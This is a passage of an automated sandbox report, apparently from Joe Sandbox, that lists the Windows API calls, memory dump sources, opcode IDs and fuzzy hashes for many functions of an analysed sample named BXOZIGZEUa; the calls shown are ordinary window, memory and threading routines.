                                                                  • Instruction Fuzzy Hash: 8B312C71500245AFCB11CFA9CD85EEFBBF9FB89710F10465AF566A72A0CB31A940CB10
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window
                                                                  • String ID:
                                                                  • API String ID: 924285169-0
                                                                  • Opcode ID: 47f53495082b82e92ba347151f6cf5efa6e25ca81bf6ebb0a32742d0ed84f10c
                                                                  • Instruction ID: bada499b138a32b2826e5a78705e7f39177bd416cc30fa1441af41f164b75a55
                                                                  • Opcode Fuzzy Hash: 47f53495082b82e92ba347151f6cf5efa6e25ca81bf6ebb0a32742d0ed84f10c
                                                                  • Instruction Fuzzy Hash: 8831F57592021AEFCF11DFA9D8849EEBBF8AF5C750B10416AF405E7221D6709954CFA0
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 001D86B6
                                                                  • GetWindowRect.USER32(00000000,?), ref: 001D86E3
                                                                  • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 001D8708
                                                                  • GetWindow.USER32(?,00000005), ref: 001D8711
                                                                  • ScrollWindow.USER32(?,?,?,?,?), ref: 001D872C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$RectScrollVisible
                                                                  • String ID:
                                                                  • API String ID: 2639402888-0
                                                                  • Opcode ID: 45bc905dd9b5e18468bb3ebacc1e0417b7c7d36da5c45db39b7041da9a6dbfd7
                                                                  • Instruction ID: 5a0097b840aef1899f257d1e7973c8db872c3fbd156afafd75cc0dc4e8008a7d
                                                                  • Opcode Fuzzy Hash: 45bc905dd9b5e18468bb3ebacc1e0417b7c7d36da5c45db39b7041da9a6dbfd7
                                                                  • Instruction Fuzzy Hash: 9F214871940208EFCF11DFA9CC89DAFBBB9FF88350F20441AF646A6251DB309A40CB61
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001DA6EE
                                                                  • GetTopWindow.USER32(00000000), ref: 001DA713
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 001DA725
                                                                  • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 001DA781
                                                                  • GetWindow.USER32(00000000,00000002), ref: 001DA7C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CtrlH_prolog3MessageSend
                                                                  • String ID:
                                                                  • API String ID: 849854284-0
                                                                  • Opcode ID: 11c1a2d4ea330c24c9b4ce368c16de91a8cd0375f7d8ac0cbe42a8cb1ec9b48d
                                                                  • Instruction ID: d9646e67946f29cbabee0275059e23d895f87d4d13804c6ccde13a01fc76da62
                                                                  • Opcode Fuzzy Hash: 11c1a2d4ea330c24c9b4ce368c16de91a8cd0375f7d8ac0cbe42a8cb1ec9b48d
                                                                  • Instruction Fuzzy Hash: 2921BF71901218ABDF25EB60DC85EFEB6B8FF65300F60815AF555E2390DB318E40CBA2
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00219E56
                                                                  • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 00219E7D
                                                                  • SendMessageW.USER32(?,0000007F,00000001,00000000), ref: 00219E91
                                                                  • GetClassLongW.USER32(?,000000DE), ref: 00219F09
                                                                  • GetClassLongW.USER32(?,000000F2), ref: 00219F17
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLongMessageSend$H_prolog3
                                                                  • String ID:
                                                                  • API String ID: 350087385-0
                                                                  • Opcode ID: dcbd197d7acfb5d352b85305f2ec1870c8bdf81cf99d75583e9e3dd98e9174ae
                                                                  • Instruction ID: ac0160abab98c57ac36ed4c28dcb512a7d6d24219103abadada8de0021bb201f
                                                                  • Opcode Fuzzy Hash: dcbd197d7acfb5d352b85305f2ec1870c8bdf81cf99d75583e9e3dd98e9174ae
                                                                  • Instruction Fuzzy Hash: BC21B331A20215ABDF21EF64CC91FEE73E8AF74750F110665F954BB1E2DA609C91CE50
                                                                  APIs
                                                                  • SetupGetStringFieldW.SETUPAPI(?,00000001,00000000,00000000,00000000), ref: 001C2A54
                                                                  • GetLastError.KERNEL32(?,?,001C2172,?), ref: 001C2A5E
                                                                  • SetupGetStringFieldW.SETUPAPI(?,00000001,?,00000000,00000000), ref: 001C2AA4
                                                                  • _wcsnlen.LIBCMT ref: 001C2ACB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FieldSetupString$ErrorLast_wcsnlen
                                                                  • String ID:
                                                                  • API String ID: 2547521842-0
                                                                  • Opcode ID: c0b2bfa788a00a39e89311f5a948dca815c6cb331b6a5ab3c0daa306b74979ab
                                                                  • Instruction ID: a8d4374cc68185a893be24b01cd89e132dd4fc4682f0b64498744c926434f29c
                                                                  • Opcode Fuzzy Hash: c0b2bfa788a00a39e89311f5a948dca815c6cb331b6a5ab3c0daa306b74979ab
                                                                  • Instruction Fuzzy Hash: 24214A71700105AFD728CFA9DC88F6AB3E9EFA8741F20056CE549D7690EB31ED408A64
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00211456
                                                                  • DestroyMenu.USER32(?,00000004,002118A4), ref: 00211492
                                                                  • IsWindow.USER32(?), ref: 002114A3
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002114B7
                                                                  • ~_Task_impl.LIBCPMT ref: 00211530
                                                                    • Part of subcall function 0026B6DD: GetParent.USER32(?), ref: 0026B743
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyH_prolog3MenuMessageParentSendTask_implWindow
                                                                  • String ID:
                                                                  • API String ID: 1857064102-0
                                                                  • Opcode ID: 4ec5271008d7079d7049c6093ddd8ba95ec44b0b953be84d5bff500d86997763
                                                                  • Instruction ID: e987f79b6c71140c2f2ba49a815ec78082429150a680cc720fda65680652b6cc
                                                                  • Opcode Fuzzy Hash: 4ec5271008d7079d7049c6093ddd8ba95ec44b0b953be84d5bff500d86997763
                                                                  • Instruction Fuzzy Hash: 6A31D130511685DFCB21EF78C945BFEBBE0AF65304F20485CE09A57282DBB56A90DF12
                                                                  APIs
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00206DF8
                                                                  • SendMessageW.USER32(?,00000086,00000000,00000000), ref: 00206E0F
                                                                  • GetDesktopWindow.USER32 ref: 00206E13
                                                                  • SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00206E34
                                                                  • GetWindow.USER32(00000000), ref: 00206E39
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$DesktopLong
                                                                  • String ID:
                                                                  • API String ID: 2272707703-0
                                                                  • Opcode ID: 4ac6bcb87ed9dc720b4b1563151e6c96ac79c35abe335cef8ba854fb85ab544e
                                                                  • Instruction ID: 0cb3004efdd90840d3b583976229b9b0ca638a6d5329e7d526c46555258d2c49
                                                                  • Opcode Fuzzy Hash: 4ac6bcb87ed9dc720b4b1563151e6c96ac79c35abe335cef8ba854fb85ab544e
                                                                  • Instruction Fuzzy Hash: 3B11EF3526075277EB312E21CC8EFAB3A689F94790F240029FE455D1E3CFA2C8708690
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 002BF929
                                                                    • Part of subcall function 002BE4B1: __FF_MSGBANNER.LIBCMT ref: 002BE4CA
                                                                    • Part of subcall function 002BE4B1: __NMSG_WRITE.LIBCMT ref: 002BE4D1
                                                                    • Part of subcall function 002BE4B1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE4F6
                                                                  • _free.LIBCMT ref: 002BF93C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free_malloc
                                                                  • String ID:
                                                                  • API String ID: 1020059152-0
                                                                  • Opcode ID: 8c0eb95ddb08acf01c312a528b0f8953a682788a1e442e71977fe1af348a37e3
                                                                  • Instruction ID: 1054f578ed792b96446de92882a9fe11ffe4db58256ee1a68d8d133a04580706
                                                                  • Opcode Fuzzy Hash: 8c0eb95ddb08acf01c312a528b0f8953a682788a1e442e71977fe1af348a37e3
                                                                  • Instruction Fuzzy Hash: 29118232964A16BBCF722F74BD447DD37589B543F0F229536F9599B190DF3088608B90
                                                                  APIs
                                                                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00207615
                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 00207624
                                                                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 0020763A
                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 00207643
                                                                  • SendMessageW.USER32(?,000003E4,?,?), ref: 0020766D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AtomGlobal$Name$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 1515195355-0
                                                                  • Opcode ID: 8a88abe25981f63da42fbe821441e74aeecf8e4edb28141b51bd1626af00b9b5
                                                                  • Instruction ID: 8d31a2bb288a1daf59695097c7626d8db00be761e4bb17a8ede0f90307cb1f2c
                                                                  • Opcode Fuzzy Hash: 8a88abe25981f63da42fbe821441e74aeecf8e4edb28141b51bd1626af00b9b5
                                                                  • Instruction Fuzzy Hash: 4E216271900218AACB20DF79CC48AEAB3FCEB18744F00459AE55E97192D774AE90CF60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ParentRect$ClientFillPointsWindow
                                                                  • String ID:
                                                                  • API String ID: 3058756167-0
                                                                  • Opcode ID: eb27e720b02b5061e8b3c937fc8f8acec49dd5eae9fd5ebe43ea0ec3d814a009
                                                                  • Instruction ID: eab1e7e4fd2986246026fb9f18f662bb973e841f3ca898bda1a350d7f5aea56b
                                                                  • Opcode Fuzzy Hash: eb27e720b02b5061e8b3c937fc8f8acec49dd5eae9fd5ebe43ea0ec3d814a009
                                                                  • Instruction Fuzzy Hash: 15214D71900209AFCB00EFA5DC498AFBBB9FF49310B11456AF945A7221DB71AD04CF90
                                                                  APIs
                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001C71B2
                                                                    • Part of subcall function 002D8838: _setlocale.LIBCMT ref: 002D884A
                                                                  • _free.LIBCMT ref: 001C71C4
                                                                    • Part of subcall function 002BE216: HeapFree.KERNEL32(00000000,00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE22C
                                                                    • Part of subcall function 002BE216: GetLastError.KERNEL32(00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056,?), ref: 002BE23E
                                                                  • _free.LIBCMT ref: 001C71D7
                                                                  • _free.LIBCMT ref: 001C71EA
                                                                  • _free.LIBCMT ref: 001C71FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                  • String ID:
                                                                  • API String ID: 3515823920-0
                                                                  • Opcode ID: 1b138b72f1a0bde290e2f3c08c71d46254b2f470239595298abece24acf37baf
                                                                  • Instruction ID: 6dca83454dbd49077b44fc7cd3e87d0e047e5630c5b9ce39cbb12d86a026bf67
                                                                  • Opcode Fuzzy Hash: 1b138b72f1a0bde290e2f3c08c71d46254b2f470239595298abece24acf37baf
                                                                  • Instruction Fuzzy Hash: DE119DF2910A00ABCA20DF59DC01A9BF7EDEB50710F544A2AE816C3780E771EA108E92
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001EF3D4
                                                                  • GetWindowRect.USER32(?,?), ref: 001EF415
                                                                  • CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 001EF43F
                                                                  • SetWindowRgn.USER32(?,?,00000000), ref: 001EF455
                                                                    • Part of subcall function 001CDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 001CDC99
                                                                  • SetWindowRgn.USER32(?,00000000,00000000), ref: 001EF471
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$CreateH_prolog3_H_prolog3_catch_Round
                                                                  • String ID:
                                                                  • API String ID: 4273792742-0
                                                                  • Opcode ID: a7cc7f8d30729608f16e02b43f398d82c22ad20c9c2840b5c024f2a450a54197
                                                                  • Instruction ID: 79bd6b9d73f4c7b575b3ebe917ac97fe24bf097a465da896a201912bfa96267b
                                                                  • Opcode Fuzzy Hash: a7cc7f8d30729608f16e02b43f398d82c22ad20c9c2840b5c024f2a450a54197
                                                                  • Instruction Fuzzy Hash: CE112C71800649DFCB21DFA6C889DEEFBB4FF88700F55022EE586A62A0DB715901DF24
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?), ref: 001D0DCB
                                                                  • _memset.LIBCMT ref: 001D0DE9
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 001D0E03
                                                                  • lstrcmpW.KERNEL32(?,?,?,?), ref: 001D0E15
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 001D0E21
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 4273134663-0
                                                                  • Opcode ID: c6070137863898466e1be3f5a2263e654c72bca0c12f51ba0b1fc80242dd8332
                                                                  • Instruction ID: 2a92b3e2e549ec56cf4df6d50b2c878d6095456da21e2589caa6305d58b17ed8
                                                                  • Opcode Fuzzy Hash: c6070137863898466e1be3f5a2263e654c72bca0c12f51ba0b1fc80242dd8332
                                                                  • Instruction Fuzzy Hash: D80161B6501219A7CB11ABB5AD88ADFB3ACEB4C750F004466F945D7242EB30D9448BA5
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0024C16F
                                                                  • EnterCriticalSection.KERNEL32(00336EB4,00000000,001EC29A,00000001), ref: 0024C1CB
                                                                  • __beginthread.LIBCMT ref: 0024C1E5
                                                                  • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0024C1FE
                                                                  • LeaveCriticalSection.KERNEL32(00336EB4), ref: 0024C215
                                                                    • Part of subcall function 001D800E: __EH_prolog3.LIBCMT ref: 001D8015
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalH_prolog3Section$EnterLeavePriorityThread__beginthread
                                                                  • String ID:
                                                                  • API String ID: 4118814795-0
                                                                  • Opcode ID: b5055a573aeb5420d764f6d799d6ba82f8c80a46500b863bd973f801cce857f2
                                                                  • Instruction ID: dc47f3bbba0d80c5367e47521fa0daae9048b71ce5fe31fbe597d8fe8e8e6b0a
                                                                  • Opcode Fuzzy Hash: b5055a573aeb5420d764f6d799d6ba82f8c80a46500b863bd973f801cce857f2
                                                                  • Instruction Fuzzy Hash: 67119474421211EFCB6ADF78EDCA44A3A68AB01B70F344329F869562E1CBF04996CF50
